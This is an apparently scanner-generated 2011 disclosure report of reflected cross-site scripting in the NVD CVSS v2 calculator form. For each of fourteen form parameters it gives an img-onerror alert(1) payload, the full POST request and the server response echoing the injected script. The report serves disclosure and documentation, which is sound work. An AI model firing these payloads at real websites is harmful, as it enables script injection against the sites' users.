Summary:
On March 16, 2011 we were using the CVSS Calculator to compute the CVSS Scores for the SmarterMail 8.0 and SmarterStats 6.0 Exploits. It was apparent that the Form was vulnerable to XSS and it turned out every field and parameter was vulnerable to XSS.
We e-mailed the address of record, but, never received a reply, yet, we know they received our e-mail due to side channel leakage, Site down, and then Form fixed. It would have been nice to document as a CVE and Publishing the Unforgivable Vulnerability further underscores a position that very few entities as of Q1/2011 truly understand the true execution risk of a Web Application.
The value of the AccessComplexityVar request parameter is copied into the HTML document as plain text between tags. The payload 90c1e<img%20src%3da%20onerror%3dalert(1)>cadc28868d1 was submitted in the AccessComplexityVar parameter. This input was echoed as 90c1e<img src=a onerror=alert(1)>cadc28868d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
POST /cvss.cfm?calculator&version=2 HTTP/1.1 Host: nvd.nist.gov Proxy-Connection: keep-alive Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C) Cache-Control: max-age=0 Origin: http://nvd.nist.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Content-Type: application/x-www-form-urlencoded Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 365
HTTP/1.1 500 Internal Server Error Content-Type: text/html Server: Microsoft-IIS/7.5 server-error: true X-Powered-By: ASP.NET Date: Thu, 17 Mar 2011 01:40:11 GMT Content-Length: 9446
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value 0.7190c1e<img src=a onerror=alert(1)>cadc28868d1 cannot be converted to a number. </h1> ...[SNIP]...
The value of the AccessVectorVar request parameter is copied into the HTML document as plain text between tags. The payload 985c5<img%20src%3da%20onerror%3dalert(1)>95fcd52d0af was submitted in the AccessVectorVar parameter. This input was echoed as 985c5<img src=a onerror=alert(1)>95fcd52d0af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
POST /cvss.cfm?calculator&version=2 HTTP/1.1 Host: nvd.nist.gov Proxy-Connection: keep-alive Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C) Cache-Control: max-age=0 Origin: http://nvd.nist.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Content-Type: application/x-www-form-urlencoded Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 365
HTTP/1.1 500 Internal Server Error Content-Type: text/html Server: Microsoft-IIS/7.5 server-error: true X-Powered-By: ASP.NET Date: Thu, 17 Mar 2011 01:40:11 GMT Content-Length: 9445
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value 1.0985c5<img src=a onerror=alert(1)>95fcd52d0af cannot be converted to a number. </h1> ...[SNIP]...
The value of the AuthenticationVar request parameter is copied into the HTML document as plain text between tags. The payload 4a7c7<img%20src%3da%20onerror%3dalert(1)>c2a5bebf2e7 was submitted in the AuthenticationVar parameter. This input was echoed as 4a7c7<img src=a onerror=alert(1)>c2a5bebf2e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
POST /cvss.cfm?calculator&version=2 HTTP/1.1 Host: nvd.nist.gov Proxy-Connection: keep-alive Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C) Cache-Control: max-age=0 Origin: http://nvd.nist.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Content-Type: application/x-www-form-urlencoded Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 365
HTTP/1.1 500 Internal Server Error Content-Type: text/html Server: Microsoft-IIS/7.5 server-error: true X-Powered-By: ASP.NET Date: Thu, 17 Mar 2011 01:40:12 GMT Content-Length: 9447
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value 0.7044a7c7<img src=a onerror=alert(1)>c2a5bebf2e7 cannot be converted to a number. </h1> ...[SNIP]...
The value of the AvailImpactVar request parameter is copied into the HTML document as plain text between tags. The payload b9a42<img%20src%3da%20onerror%3dalert(1)>99a13d10808 was submitted in the AvailImpactVar parameter. This input was echoed as b9a42<img src=a onerror=alert(1)>99a13d10808 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
POST /cvss.cfm?calculator&version=2 HTTP/1.1 Host: nvd.nist.gov Proxy-Connection: keep-alive Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C) Cache-Control: max-age=0 Origin: http://nvd.nist.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Content-Type: application/x-www-form-urlencoded Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 365
HTTP/1.1 500 Internal Server Error Content-Type: text/html Server: Microsoft-IIS/7.5 server-error: true X-Powered-By: ASP.NET Date: Thu, 17 Mar 2011 01:40:14 GMT Content-Length: 9442
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value 0.660b9a42<img src=a onerror=alert(1)>99a13d10808 cannot be converted to a number. </h1> ...[SNIP]...
The value of the AvailabilityRequirementVar request parameter is copied into the HTML document as plain text between tags. The payload 6fe4f<img%20src%3da%20onerror%3dalert(1)>1e68c5fc824 was submitted in the AvailabilityRequirementVar parameter. This input was echoed as 6fe4f<img src=a onerror=alert(1)>1e68c5fc824 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
POST /cvss.cfm?calculator&version=2 HTTP/1.1 Host: nvd.nist.gov Proxy-Connection: keep-alive Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C) Cache-Control: max-age=0 Origin: http://nvd.nist.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Content-Type: application/x-www-form-urlencoded Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 365
HTTP/1.1 500 Internal Server Error Content-Type: text/html Server: Microsoft-IIS/7.5 server-error: true X-Powered-By: ASP.NET Date: Thu, 17 Mar 2011 01:40:16 GMT Content-Length: 9564
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value -16fe4f<img src=a onerror=alert(1)>1e68c5fc824 cannot be converted to a number. </h1> ...[SNIP]...
The value of the CollateralDamagePotentialVar request parameter is copied into the HTML document as plain text between tags. The payload 22afc<img%20src%3da%20onerror%3dalert(1)>4b7e5cb61d9 was submitted in the CollateralDamagePotentialVar parameter. This input was echoed as 22afc<img src=a onerror=alert(1)>4b7e5cb61d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
POST /cvss.cfm?calculator&version=2 HTTP/1.1 Host: nvd.nist.gov Proxy-Connection: keep-alive Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C) Cache-Control: max-age=0 Origin: http://nvd.nist.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Content-Type: application/x-www-form-urlencoded Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 365
HTTP/1.1 500 Internal Server Error Content-Type: text/html Server: Microsoft-IIS/7.5 server-error: true X-Powered-By: ASP.NET Date: Thu, 17 Mar 2011 01:40:14 GMT Content-Length: 9586
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value -122afc<img src=a onerror=alert(1)>4b7e5cb61d9 cannot be converted to a number. </h1> ...[SNIP]...
The value of the ConfImpactVar request parameter is copied into the HTML document as plain text between tags. The payload 4ed35<img%20src%3da%20onerror%3dalert(1)>74427bc6818 was submitted in the ConfImpactVar parameter. This input was echoed as 4ed35<img src=a onerror=alert(1)>74427bc6818 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
POST /cvss.cfm?calculator&version=2 HTTP/1.1 Host: nvd.nist.gov Proxy-Connection: keep-alive Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C) Cache-Control: max-age=0 Origin: http://nvd.nist.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Content-Type: application/x-www-form-urlencoded Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 365
HTTP/1.1 500 Internal Server Error Content-Type: text/html Server: Microsoft-IIS/7.5 server-error: true X-Powered-By: ASP.NET Date: Thu, 17 Mar 2011 01:40:13 GMT Content-Length: 9442
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value 0.6604ed35<img src=a onerror=alert(1)>74427bc6818 cannot be converted to a number. </h1> ...[SNIP]...
The value of the ConfidentialityRequirementVar request parameter is copied into the HTML document as plain text between tags. The payload 6dd8d<img%20src%3da%20onerror%3dalert(1)>8035976d30a was submitted in the ConfidentialityRequirementVar parameter. This input was echoed as 6dd8d<img src=a onerror=alert(1)>8035976d30a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
POST /cvss.cfm?calculator&version=2 HTTP/1.1 Host: nvd.nist.gov Proxy-Connection: keep-alive Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C) Cache-Control: max-age=0 Origin: http://nvd.nist.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Content-Type: application/x-www-form-urlencoded Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 365
HTTP/1.1 500 Internal Server Error Content-Type: text/html Server: Microsoft-IIS/7.5 server-error: true X-Powered-By: ASP.NET Date: Thu, 17 Mar 2011 01:40:15 GMT Content-Length: 9564
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value -16dd8d<img src=a onerror=alert(1)>8035976d30a cannot be converted to a number. </h1> ...[SNIP]...
The value of the ExploitabilityVar request parameter is copied into the HTML document as plain text between tags. The payload 249f3<img%20src%3da%20onerror%3dalert(1)>56ad8b2ec23 was submitted in the ExploitabilityVar parameter. This input was echoed as 249f3<img src=a onerror=alert(1)>56ad8b2ec23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
POST /cvss.cfm?calculator&version=2 HTTP/1.1 Host: nvd.nist.gov Proxy-Connection: keep-alive Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C) Cache-Control: max-age=0 Origin: http://nvd.nist.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Content-Type: application/x-www-form-urlencoded Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 365
HTTP/1.1 500 Internal Server Error Content-Type: text/html Server: Microsoft-IIS/7.5 server-error: true X-Powered-By: ASP.NET Date: Thu, 17 Mar 2011 01:40:17 GMT Content-Length: 9521
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value -1249f3<img src=a onerror=alert(1)>56ad8b2ec23 cannot be converted to a number. </h1> ...[SNIP]...
The value of the IntegImpactVar request parameter is copied into the HTML document as plain text between tags. The payload 8720b<img%20src%3da%20onerror%3dalert(1)>ed0ce7f1cbb was submitted in the IntegImpactVar parameter. This input was echoed as 8720b<img src=a onerror=alert(1)>ed0ce7f1cbb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
POST /cvss.cfm?calculator&version=2 HTTP/1.1 Host: nvd.nist.gov Proxy-Connection: keep-alive Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C) Cache-Control: max-age=0 Origin: http://nvd.nist.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Content-Type: application/x-www-form-urlencoded Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 365
HTTP/1.1 500 Internal Server Error Content-Type: text/html Server: Microsoft-IIS/7.5 server-error: true X-Powered-By: ASP.NET Date: Thu, 17 Mar 2011 01:40:13 GMT Content-Length: 9442
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value 0.6608720b<img src=a onerror=alert(1)>ed0ce7f1cbb cannot be converted to a number. </h1> ...[SNIP]...
The value of the IntegrityRequirementVar request parameter is copied into the HTML document as plain text between tags. The payload 97b09<img%20src%3da%20onerror%3dalert(1)>c114a31754d was submitted in the IntegrityRequirementVar parameter. This input was echoed as 97b09<img src=a onerror=alert(1)>c114a31754d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
POST /cvss.cfm?calculator&version=2 HTTP/1.1 Host: nvd.nist.gov Proxy-Connection: keep-alive Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C) Cache-Control: max-age=0 Origin: http://nvd.nist.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Content-Type: application/x-www-form-urlencoded Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 365
HTTP/1.1 500 Internal Server Error Content-Type: text/html Server: Microsoft-IIS/7.5 server-error: true X-Powered-By: ASP.NET Date: Thu, 17 Mar 2011 01:40:16 GMT Content-Length: 9564
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value -197b09<img src=a onerror=alert(1)>c114a31754d cannot be converted to a number. </h1> ...[SNIP]...
The value of the RemediationLevelVar request parameter is copied into the HTML document as plain text between tags. The payload 6d0c9<img%20src%3da%20onerror%3dalert(1)>19caa74cac7 was submitted in the RemediationLevelVar parameter. This input was echoed as 6d0c9<img src=a onerror=alert(1)>19caa74cac7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
POST /cvss.cfm?calculator&version=2 HTTP/1.1 Host: nvd.nist.gov Proxy-Connection: keep-alive Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C) Cache-Control: max-age=0 Origin: http://nvd.nist.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Content-Type: application/x-www-form-urlencoded Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 365
HTTP/1.1 500 Internal Server Error Content-Type: text/html Server: Microsoft-IIS/7.5 server-error: true X-Powered-By: ASP.NET Date: Thu, 17 Mar 2011 01:40:18 GMT Content-Length: 9522
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value -16d0c9<img src=a onerror=alert(1)>19caa74cac7 cannot be converted to a number. </h1> ...[SNIP]...
The value of the ReportConfidenceVar request parameter is copied into the HTML document as plain text between tags. The payload 41d28<img%20src%3da%20onerror%3dalert(1)>e183273590e was submitted in the ReportConfidenceVar parameter. This input was echoed as 41d28<img src=a onerror=alert(1)>e183273590e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
POST /cvss.cfm?calculator&version=2 HTTP/1.1 Host: nvd.nist.gov Proxy-Connection: keep-alive Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C) Cache-Control: max-age=0 Origin: http://nvd.nist.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Content-Type: application/x-www-form-urlencoded Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 365
HTTP/1.1 500 Internal Server Error Content-Type: text/html Server: Microsoft-IIS/7.5 server-error: true X-Powered-By: ASP.NET Date: Thu, 17 Mar 2011 01:40:18 GMT Content-Length: 9522
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value -141d28<img src=a onerror=alert(1)>e183273590e cannot be converted to a number. </h1> ...[SNIP]...
The value of the TargetDistributionVar request parameter is copied into the HTML document as plain text between tags. The payload 64e3c<img%20src%3da%20onerror%3dalert(1)>c220e7f3ec0 was submitted in the TargetDistributionVar parameter. This input was echoed as 64e3c<img src=a onerror=alert(1)>c220e7f3ec0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
POST /cvss.cfm?calculator&version=2 HTTP/1.1 Host: nvd.nist.gov Proxy-Connection: keep-alive Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C) Cache-Control: max-age=0 Origin: http://nvd.nist.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Content-Type: application/x-www-form-urlencoded Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 365
HTTP/1.1 500 Internal Server Error Content-Type: text/html Server: Microsoft-IIS/7.5 server-error: true X-Powered-By: ASP.NET Date: Thu, 17 Mar 2011 01:40:15 GMT Content-Length: 9586
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value -164e3c<img src=a onerror=alert(1)>c220e7f3ec0 cannot be converted to a number. </h1> ...[SNIP]...
Report generated by XSS.CX Home at Wed Mar 16 20:47:21 CDT 2011.
